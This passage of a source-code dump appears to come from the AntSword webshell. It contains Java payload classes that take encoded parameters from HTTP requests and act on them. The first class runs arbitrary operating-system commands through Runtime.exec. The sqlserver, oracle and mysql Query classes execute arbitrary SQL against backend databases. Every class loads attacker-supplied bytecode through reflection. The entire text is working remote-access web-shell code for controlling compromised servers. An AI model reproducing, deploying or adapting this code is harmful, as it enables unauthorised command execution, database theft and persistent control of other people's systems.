17 | public String decoderClassdata;
18 |
19 | @Override
20 | public boolean equals(Object obj) {
21 | this.parseObj(obj);
22 | StringBuffer output = new StringBuffer();
23 | String tag_s = "->|";
24 | String tag_e = "|<-";
25 | String varkey1 = "antswordargbin";
26 | String varkey2 = "antswordargcmd";
27 | String varkey3 = "antswordargenv";
28 | String varkeydecoder = "antswordargdecoder";
29 |
30 | try {
31 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
32 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
33 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
34 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
35 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
36 | String z3 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey3));
37 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
38 | output.append(ExecuteCommandCode(z1, z2, z3));
39 | } catch (Exception e) {
40 | output.append("ERROR:// " + e);
41 | }
42 | try {
43 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
44 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
45 | } catch (Exception ignored) {
46 | }
47 | return true;
48 | }
49 |
50 | String decode(String str) throws Exception {
51 | int prefixlen = 0;
52 | try {
53 | prefixlen = Integer.parseInt(randomPrefix);
54 | str = str.substring(prefixlen);
55 | } catch (Exception e) {
56 | prefixlen = 0;
57 | }
58 | if (encoder.equals("hex")) {
59 | if (str == null || str.equals("")) {
60 | return "";
61 | }
62 | String hexString = "0123456789ABCDEF";
63 | str = str.toUpperCase();
64 | ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length() / 2);
65 | String ss = "";
66 | for (int i = 0; i < str.length(); i += 2) {
67 | ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ",";
68 | baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
69 | }
70 | return baos.toString(cs);
71 | } else if (encoder.equals("base64")) {
72 | return new String(this.Base64DecodeToByte(str), this.cs);
73 | }
74 | return str;
75 | }
76 |
77 | public String ExecuteCommandCode(String cmdPath, String command, String envstr) throws Exception {
78 | StringBuffer sb = new StringBuffer();
79 | String[] c = {cmdPath, !isWin() ? "-c" : "/c", command};
80 | Map readonlyenv = System.getenv();
81 | Map cmdenv = new HashMap(readonlyenv);
82 | String[] envs = envstr.split("\\|\\|\\|asline\\|\\|\\|");
83 | for (int i = 0; i < envs.length; i++) {
84 | String[] es = envs[i].split("\\|\\|\\|askey\\|\\|\\|");
85 | if (es.length == 2) {
86 | cmdenv.put(es[0], es[1]);
87 | }
88 | }
89 | String[] e = new String[cmdenv.size()];
90 | int i = 0;
91 | for (String key : cmdenv.keySet()) {
92 | e[i] = key + "=" + cmdenv.get(key);
93 | i++;
94 | }
95 | Process p = Runtime.getRuntime().exec(c, e);
96 | CopyInputStream(p.getInputStream(), sb);
97 | CopyInputStream(p.getErrorStream(), sb);
98 | return sb.toString();
99 | }
100 |
101 | boolean isWin() {
102 | String osname = System.getProperty("os.name");
103 | osname = osname.toLowerCase();
104 | return osname.startsWith("win");
105 | }
106 |
107 | void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
108 | String l;
109 | BufferedReader br = new BufferedReader(new InputStreamReader(is, cs));
110 | while ((l = br.readLine()) != null) {
111 | sb.append(l + "\r\n");
112 | }
113 | br.close();
114 | }
115 |
116 | public void parseObj(Object obj) {
117 | if (obj.getClass().isArray()) {
118 | Object[] data = (Object[]) obj;
119 | request = data[0];
120 | response = data[1];
121 | } else {
122 | try {
123 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
124 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
125 | } catch (Exception e) {
126 | request = obj;
127 | try {
128 | Field req = request.getClass().getDeclaredField("request");
129 | req.setAccessible(true);
130 | Object request2 = req.get(request);
131 | Field resp = request2.getClass().getDeclaredField("response");
132 | resp.setAccessible(true);
133 | response = resp.get(request2);
134 | } catch (Exception ex) {
135 | try {
136 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
137 | } catch (Exception ignored) {
138 |
139 | }
140 | }
141 | }
142 | }
143 | }
144 |
145 | public String asoutput(String str) {
146 | try {
147 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
148 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
149 | defineClassMethod.setAccessible(true);
150 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
151 | return cc.getConstructor(String.class).newInstance(str).toString();
152 | } catch (Exception e) {
153 | return str;
154 | }
155 | }
156 |
157 | public byte[] Base64DecodeToByte(String str) {
158 | byte[] bt = null;
159 | String version = System.getProperty("java.version");
160 | try {
161 | if (version.compareTo("1.9") >= 0) {
162 | Class clazz = Class.forName("java.util.Base64");
163 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
164 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
165 | } else {
166 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
167 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
168 | }
169 | return bt;
170 | } catch (Exception e) {
171 | return new byte[]{};
172 | }
173 | }
174 | }
175 |
--------------------------------------------------------------------------------
/src/database/sqlserver/Query.java:
--------------------------------------------------------------------------------
1 | package database.sqlserver;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Query {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 |
19 | String tag_s = "->|";
20 | String tag_e = "|<-";
21 | String varkey1 = "antswordargencode";
22 | String varkey2 = "antswordargconn";
23 | String varkey3 = "antswordargsql";
24 | String varkeydecoder = "antswordargdecoder";
25 |
26 | try {
27 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
28 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
29 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
30 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
31 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
32 | String z3 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey3));
33 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
34 | output.append(query(z1, z2, z3));
35 | } catch (Exception e) {
36 | output.append("ERROR:// " + e);
37 | }
38 | try {
39 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
40 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
41 | } catch (Exception ignored) {
42 | }
43 | return true;
44 | }
45 |
46 | String decode(String str) throws Exception {
47 | int prefixlen = 0;
48 | try {
49 | prefixlen = Integer.parseInt(randomPrefix);
50 | str = str.substring(prefixlen);
51 | } catch (Exception e) {
52 | prefixlen = 0;
53 | }
54 | if (encoder.equals("base64")) {
55 | return new String(this.Base64DecodeToByte(str), this.cs);
56 | }
57 | return str;
58 | }
59 |
60 | String Base64Encode(String str) {
61 | String version = System.getProperty("java.version");
62 | try {
63 | String ret = "";
64 | if (version.compareTo("1.9") >= 0) {
65 | Class Base64 = Class.forName("java.util.Base64");
66 | Object Encoder = Base64.getMethod("getEncoder", new Class[0]).invoke(Base64);
67 | ret = (String) Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, str.getBytes());
68 | } else {
69 | Class Base64 = Class.forName("sun.misc.BASE64Encoder");
70 | Object Encoder = Base64.getDeclaredConstructor().newInstance();
71 | ret = (String) Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, str.getBytes());
72 | }
73 | ret = ret.replaceAll("\r|\n", "");
74 | return ret;
75 | } catch (Exception e) {
76 | return "";
77 | }
78 | }
79 |
80 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
81 | throws Exception {
82 | String ret = "";
83 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
84 | Class.forName(x[0].trim());
85 | String url = x[1];
86 | Connection c = DriverManager.getConnection(url);
87 | Statement stmt = c.createStatement();
88 | boolean isRS = stmt.execute(sql);
89 | if (isRS) {
90 | ResultSet rs = stmt.getResultSet();
91 | ResultSetMetaData rsmd = rs.getMetaData();
92 |
93 | if (needcoluname) {
94 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
95 | String columnName = rsmd.getColumnName(i);
96 | ret += columnName + columnsep;
97 | }
98 | ret += rowsep;
99 | }
100 |
101 | while (rs.next()) {
102 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
103 | String columnValue = rs.getString(i);
104 | ret += Base64Encode(columnValue) + columnsep;
105 | }
106 | ret += rowsep;
107 | }
108 | } else {
109 | ret += "Result" + columnsep + rowsep;
110 | int rowCount = stmt.getUpdateCount();
111 | if (rowCount > 0) {
112 | ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep;
113 | } else if (rowCount == 0) {
114 | ret += Base64Encode("No rows changed or statement was DDL command") + columnsep + rowsep;
115 | } else {
116 | ret += Base64Encode("False") + columnsep + rowsep;
117 | }
118 | }
119 | return ret;
120 | }
121 |
122 | String query(String encode, String conn, String sql) throws Exception {
123 | String columnsep = "\t|\t";
124 | String rowsep = "\r\n";
125 | return executeSQL(encode, conn, sql, columnsep, rowsep, true);
126 | }
127 |
128 | public void parseObj(Object obj) {
129 | if (obj.getClass().isArray()) {
130 | Object[] data = (Object[]) obj;
131 | request = data[0];
132 | response = data[1];
133 | } else {
134 | try {
135 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
136 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
137 | } catch (Exception e) {
138 | request = obj;
139 | try {
140 | Field req = request.getClass().getDeclaredField("request");
141 | req.setAccessible(true);
142 | Object request2 = req.get(request);
143 | Field resp = request2.getClass().getDeclaredField("response");
144 | resp.setAccessible(true);
145 | response = resp.get(request2);
146 | } catch (Exception ex) {
147 | try {
148 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
149 | } catch (Exception ignored) {
150 |
151 | }
152 | }
153 | }
154 | }
155 | }
156 |
157 | public String asoutput(String str) {
158 | try {
159 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
160 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
161 | defineClassMethod.setAccessible(true);
162 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
163 | return cc.getConstructor(String.class).newInstance(str).toString();
164 | } catch (Exception e) {
165 | return str;
166 | }
167 | }
168 |
169 | public byte[] Base64DecodeToByte(String str) {
170 | byte[] bt = null;
171 | String version = System.getProperty("java.version");
172 | try {
173 | if (version.compareTo("1.9") >= 0) {
174 | Class clazz = Class.forName("java.util.Base64");
175 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
176 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
177 | } else {
178 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
179 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
180 | }
181 | return bt;
182 | } catch (Exception e) {
183 | return new byte[]{};
184 | }
185 | }
186 | }
--------------------------------------------------------------------------------
/src/database/oracle/Query.java:
--------------------------------------------------------------------------------
1 | package database.oracle;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Query {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargencode";
21 | String varkey2 = "antswordargconn";
22 | String varkey3 = "antswordargsql";
23 | String varkeydecoder = "antswordargdecoder";
24 |
25 | try {
26 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
27 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
28 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
29 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
30 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
31 | String z3 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey3));
32 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
33 | output.append(query(z1, z2, z3));
34 |
35 | } catch (Exception e) {
36 | output.append("ERROR:// " + e);
37 | }
38 | try {
39 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
40 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
41 | } catch (Exception ignored) {
42 | }
43 | return true;
44 | }
45 |
46 | String decode(String str) throws Exception {
47 | int prefixlen = 0;
48 | try {
49 | prefixlen = Integer.parseInt(randomPrefix);
50 | str = str.substring(prefixlen);
51 | } catch (Exception e) {
52 | prefixlen = 0;
53 | }
54 | if (encoder.equals("base64")) {
55 | return new String(this.Base64DecodeToByte(str), this.cs);
56 | }
57 | return str;
58 | }
59 |
60 | String Base64Encode(String str) {
61 | String version = System.getProperty("java.version");
62 | try {
63 | String ret = "";
64 | if (version.compareTo("1.9") >= 0) {
65 | Class Base64 = Class.forName("java.util.Base64");
66 | Object Encoder = Base64.getMethod("getEncoder", new Class[0]).invoke(Base64);
67 | ret = (String) Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, str.getBytes());
68 | } else {
69 | Class Base64 = Class.forName("sun.misc.BASE64Encoder");
70 | Object Encoder = Base64.getDeclaredConstructor().newInstance();
71 | ret = (String) Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, str.getBytes());
72 | }
73 | ret = ret.replaceAll("\r|\n", "");
74 | return ret;
75 | } catch (Exception e) {
76 | return "";
77 | }
78 | }
79 |
80 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
81 | throws Exception {
82 | String ret = "";
83 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
84 | Class.forName(x[0].trim());
85 | String url = x[1];
86 | Connection c = DriverManager.getConnection(url, x[2], x[3]);
87 | Statement stmt = c.createStatement();
88 | boolean isRS = stmt.execute(sql);
89 | if (isRS) {
90 | ResultSet rs = stmt.getResultSet();
91 | ResultSetMetaData rsmd = rs.getMetaData();
92 |
93 | if (needcoluname) {
94 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
95 | String columnName = rsmd.getColumnName(i);
96 | ret += columnName + columnsep;
97 | }
98 | ret += rowsep;
99 | }
100 |
101 | while (rs.next()) {
102 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
103 | String columnValue = rs.getString(i);
104 | ret += Base64Encode(columnValue) + columnsep;
105 | }
106 | ret += rowsep;
107 | }
108 | } else {
109 | ret += "Result" + columnsep + rowsep;
110 | int rowCount = stmt.getUpdateCount();
111 | if (rowCount > 0) {
112 | ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep;
113 | } else if (rowCount == 0) {
114 | ret += Base64Encode("No rows changed or statement was DDL command") + columnsep + rowsep;
115 | } else {
116 | ret += Base64Encode("False") + columnsep + rowsep;
117 | }
118 | }
119 | return ret;
120 | }
121 |
122 | String query(String encode, String conn, String sql) throws Exception {
123 | String columnsep = "\t|\t";
124 | String rowsep = "\r\n";
125 | return executeSQL(encode, conn, sql, columnsep, rowsep, true);
126 | }
127 |
128 | public void parseObj(Object obj) {
129 | if (obj.getClass().isArray()) {
130 | Object[] data = (Object[]) obj;
131 | request = data[0];
132 | response = data[1];
133 | } else {
134 | try {
135 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
136 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
137 | } catch (Exception e) {
138 | request = obj;
139 | try {
140 | Field req = request.getClass().getDeclaredField("request");
141 | req.setAccessible(true);
142 | Object request2 = req.get(request);
143 | Field resp = request2.getClass().getDeclaredField("response");
144 | resp.setAccessible(true);
145 | response = resp.get(request2);
146 | } catch (Exception ex) {
147 | try {
148 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
149 | } catch (Exception ignored) {
150 |
151 | }
152 | }
153 | }
154 | }
155 | }
156 |
157 | public String asoutput(String str) {
158 | try {
159 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
160 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
161 | defineClassMethod.setAccessible(true);
162 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
163 | return cc.getConstructor(String.class).newInstance(str).toString();
164 | } catch (Exception e) {
165 | return str;
166 | }
167 | }
168 |
169 | public byte[] Base64DecodeToByte(String str) {
170 | byte[] bt = null;
171 | String version = System.getProperty("java.version");
172 | try {
173 | if (version.compareTo("1.9") >= 0) {
174 | Class clazz = Class.forName("java.util.Base64");
175 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
176 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
177 | } else {
178 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
179 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
180 | }
181 | return bt;
182 | } catch (Exception e) {
183 | return new byte[]{};
184 | }
185 | }
186 | }
--------------------------------------------------------------------------------
/src/database/mysql/Query.java:
--------------------------------------------------------------------------------
1 | package database.mysql;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Query {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargencode";
21 | String varkey2 = "antswordargconn";
22 | String varkey3 = "antswordargsql";
23 | String varkeydecoder = "antswordargdecoder";
24 |
25 | try {
26 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
27 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
28 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
29 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
30 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
31 | String z3 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey3));
32 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
33 | output.append(query(z1, z2, z3));
34 | } catch (Exception e) {
35 | output.append("ERROR:// " + e);
36 | }
37 | try {
38 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
39 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
40 | } catch (Exception ignored) {
41 | }
42 | return true;
43 | }
44 |
45 | String decode(String str) throws Exception {
46 | int prefixlen = 0;
47 | try {
48 | prefixlen = Integer.parseInt(randomPrefix);
49 | str = str.substring(prefixlen);
50 | } catch (Exception e) {
51 | prefixlen = 0;
52 | }
53 | if (encoder.equals("base64")) {
54 | return new String(this.Base64DecodeToByte(str), this.cs);
55 | }
56 | return str;
57 | }
58 |
59 | String Base64Encode(String str) {
60 | String version = System.getProperty("java.version");
61 | try {
62 | String ret = "";
63 | if (version.compareTo("1.9") >= 0) {
64 | Class Base64 = Class.forName("java.util.Base64");
65 | Object Encoder = Base64.getMethod("getEncoder", new Class[0]).invoke(Base64);
66 | ret = (String) Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, str.getBytes());
67 | } else {
68 | Class Base64 = Class.forName("sun.misc.BASE64Encoder");
69 | Object Encoder = Base64.getDeclaredConstructor().newInstance();
70 | ret = (String) Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, str.getBytes());
71 | }
72 | ret = ret.replaceAll("\r|\n", "");
73 | return ret;
74 | } catch (Exception e) {
75 | return "";
76 | }
77 | }
78 |
79 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
80 | throws Exception {
81 | String ret = "";
82 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
83 | Class.forName(x[0].trim());
84 | String url = x[1] + "&characterEncoding=" + encode;
85 | Connection c = DriverManager.getConnection(url);
86 | Statement stmt = c.createStatement();
87 | boolean isRS = stmt.execute(sql);
88 | if (isRS) {
89 | ResultSet rs = stmt.getResultSet();
90 | ResultSetMetaData rsmd = rs.getMetaData();
91 |
92 | if (needcoluname) {
93 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
94 | String columnName = rsmd.getColumnName(i);
95 | ret += columnName + columnsep;
96 | }
97 | ret += rowsep;
98 | }
99 |
100 | while (rs.next()) {
101 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
102 | String columnValue = rs.getString(i);
103 | ret += Base64Encode(columnValue) + columnsep;
104 | }
105 | ret += rowsep;
106 | }
107 | } else {
108 | ret += "Result" + columnsep + rowsep;
109 | int rowCount = stmt.getUpdateCount();
110 | if (rowCount > 0) {
111 | ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep;
112 | } else if (rowCount == 0) {
113 | ret += Base64Encode("No rows changed or statement was DDL command") + columnsep + rowsep;
114 | } else {
115 | ret += Base64Encode("False") + columnsep + rowsep;
116 | }
117 | }
118 | return ret;
119 | }
120 |
121 | String query(String encode, String conn, String sql) throws Exception {
122 | String columnsep = "\t|\t";
123 | String rowsep = "\r\n";
124 | return executeSQL(encode, conn, sql, columnsep, rowsep, true);
125 | }
126 |
127 | public void parseObj(Object obj) {
128 | if (obj.getClass().isArray()) {
129 | Object[] data = (Object[]) obj;
130 | request = data[0];
131 | response = data[1];
132 | } else {
133 | try {
134 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
135 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
136 | } catch (Exception e) {
137 | request = obj;
138 | try {
139 | Field req = request.getClass().getDeclaredField("request");
140 | req.setAccessible(true);
141 | Object request2 = req.get(request);
142 | Field resp = request2.getClass().getDeclaredField("response");
143 | resp.setAccessible(true);
144 | response = resp.get(request2);
145 | } catch (Exception ex) {
146 | try {
147 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
148 | } catch (Exception ignored) {
149 |
150 | }
151 | }
152 | }
153 | }
154 | }
155 |
156 | public String asoutput(String str) {
157 | try {
158 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
159 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
160 | defineClassMethod.setAccessible(true);
161 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
162 | return cc.getConstructor(String.class).newInstance(str).toString();
163 | } catch (Exception e) {
164 | return str;
165 | }
166 | }
167 |
168 | public byte[] Base64DecodeToByte(String str) {
169 | byte[] bt = null;
170 | String version = System.getProperty("java.version");
171 | try {
172 | if (version.compareTo("1.9") >= 0) {
173 | Class clazz = Class.forName("java.util.Base64");
174 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
175 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
176 | } else {
177 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
178 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
179 | }
180 | return bt;
181 | } catch (Exception e) {
182 | return new byte[]{};
183 | }
184 | }
185 | }
--------------------------------------------------------------------------------